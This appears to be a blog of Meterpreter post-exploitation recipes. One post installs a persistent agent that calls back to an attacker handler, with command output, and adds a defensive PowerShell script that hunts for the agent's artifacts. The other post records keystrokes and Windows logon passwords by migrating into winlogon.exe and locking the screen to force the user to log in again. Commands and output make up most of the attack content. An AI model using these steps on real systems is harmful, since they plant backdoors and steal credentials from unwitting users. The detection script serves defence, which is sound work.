
Friday, 11 May 2012

Persistent Meterpreter Session

Example 1:

 // After gaining a Meterpreter shell on the target machine, upload and install
 // our persistent agent

 meterpreter > run persistence -S -i 1 -p 443 -r 192.168.1.10

 // -S installs the agent as a service on the target machine (it starts at boot, as SYSTEM)
 // -i specifies the interval in seconds between connection attempts (1 s is very noisy on the wire)
 // -p specifies the port on our handler that the agent will connect back to
 // -r specifies the IP address of our handler

 [*] Creating a persistent agent: LHOST=192.168.1.10 LPORT=443 (interval=1 onboot=true)
 [*] Persistent agent script is 614100 bytes long
 [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\oqRUfRY.vbs
 [*] Agent executed with PID 3320
 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FmasPLYc
 [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FmasPLYc
 [*] Creating service ONvoLxVurSB
Example 2:

run persistence -A -L C:\\ -X -i 10 -p 443 -r 172.16.56.1

The -A parameter automatically starts the multi/handler on our side. Another
option is -L, which lets us specify the location on the target host where
the payload (the .vbs agent) will be written; for our scenario we have chosen
C:\\ as the path in order to find the backdoor easily. The -X option is there
because we want the backdoor to start when the system boots (it is installed
under the HKLM Run key). Alternatively there is the -U option, which starts
the agent when the user logs on instead (HKCU Run key). For the interval we
have set 10 seconds, and for the port the backdoor will connect back to we
use 443, which is allowed outbound in most Windows environments. Finally, the
-r option is our IP address.

Note that each run leaves three artifacts on the target: the script file at
the chosen path, the Run-key value, and (with -S) a service. All three must be
removed when the engagement is over.
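For the defensive side of the same technique, here is an added example (not code from the original post, nor from Metasploit) that hunts for the three artifacts the output above reveals: a script dropped under a TEMP directory, a Run value that launches it, and a service whose binary path points at it, plus any wscript/cscript instance already running such a script. It assumes an elevated PowerShell session on the host being checked; the regular expression and the layout of the result objects are this example's own choices, tuned to the default C:\WINDOWS\TEMP\<random>.vbs drop. When -L was used to put the agent elsewhere (C:\\ in Example 2), widen the pattern accordingly.

```powershell
# Added example: hunt for artifacts left by Metasploit's persistence script.
# Assumptions (not from the original post): run as Administrator on the
# host being checked; agent is a script under a TEMP directory started
# via a Run value (-X/-U), a service (-S), or already live in wscript/cscript.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',   # -X (machine-wide)
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'    # -U (per-user)
)

# Properties PowerShell itself adds to every registry key object.
$psMeta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

# A script that lives under a \TEMP\ or \tmp\ directory. -match is
# case-insensitive by default. Pattern is this example's assumption.
$scriptInTemp = '\\te?mp\\[^\\"]+\.(vbs|vbe|wsf|js|bat|cmd|ps1)'

$findings = New-Object System.Collections.Generic.List[object]

# 1. Run keys: any value whose command references a script under TEMP.
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $values = Get-ItemProperty -Path $key
    foreach ($v in $values.PSObject.Properties) {
        if ($psMeta -contains $v.Name) { continue }
        if ("$($v.Value)" -match $scriptInTemp) {
            $findings.Add([pscustomobject]@{
                Type    = 'RunKey'
                Name    = "$key\$($v.Name)"
                Command = $v.Value
            })
        }
    }
}

# 2. Services (-S): the persistence service's PathName points at the agent.
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ("$($svc.PathName)" -match $scriptInTemp) {
        $findings.Add([pscustomobject]@{
            Type    = 'Service'
            Name    = $svc.Name
            Command = $svc.PathName
        })
    }
}

# 3. Live agents: a script host already executing a script from TEMP.
$filter = "Name = 'wscript.exe' OR Name = 'cscript.exe'"
foreach ($p in Get-CimInstance -ClassName Win32_Process -Filter $filter) {
    if ("$($p.CommandLine)" -match $scriptInTemp) {
        $findings.Add([pscustomobject]@{
            Type    = 'Process'
            Name    = "PID $($p.ProcessId)"
            Command = $p.CommandLine
        })
    }
}

if ($findings.Count -eq 0) {
    'No Run values, services or script hosts referencing a script under TEMP.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it from an elevated prompt; the HKCU branch only sees the current user's hive, so check other profiles' NTUSER.DAT separately if -U persistence is suspected for another account. Treat every hit as a candidate, not proof: delete the file, the Run value and the service only after confirming they are not legitimate software.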

Wednesday, 23 November 2011

Meterpreter Keylogger Problem

Yes, sometimes for some reason the keylogger does not work. In such cases, after opening the Meterpreter session, if you run the command


run keylogrecorder -c 0
 
[*]     explorer.exe Process found, migrating into 2812
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to 
C:/Users/Faruk/.msf3/logs/scripts/keylogrecorder/....txt
[*] Recording
 
you get a result like this,
 
or
 
meterpreter > getsystem
 ...got system (via technique 1).
meterpreter > run keylogrecorder -c 0 -t 15
[*]     spshell.exe Process found, migrating into 1980 
 
you can try this...

To capture the Windows password you first need to migrate into the winlogon.exe process.


meterpreter > ps
Process list
============
 
 PID    Name                 Arch  Session  User
 ---    ----                 ----  -------  ----
 0      [System Process]
 4      System               x86   0        NT AUTHORITY\SYSTEM
 544    smss.exe             x86   0        NT AUTHORITY\SYSTEM
 608    csrss.exe            x86   0        NT AUTHORITY\SYSTEM
 2976   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM
meterpreter > migrate 2976
[*] Migrating to 2976...
[*] Migration completed successfully.
 

 
-c  capture type: 0 (the default) records the logged-on user's keystrokes, with the
    script migrating into explorer.exe; 1 captures Winlogon credentials, with the
    script migrating into winlogon.exe.
-l  locks the screen (forces the user back to the logon prompt), so the Windows
    password is typed again and captured without waiting.
-t  interval in seconds at which the recorded keystrokes are collected.

meterpreter> run keylogrecorder -c 1 -l -t 5
[*] Locking Screen...
[*] Screen has been locked
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/...
[*] Recording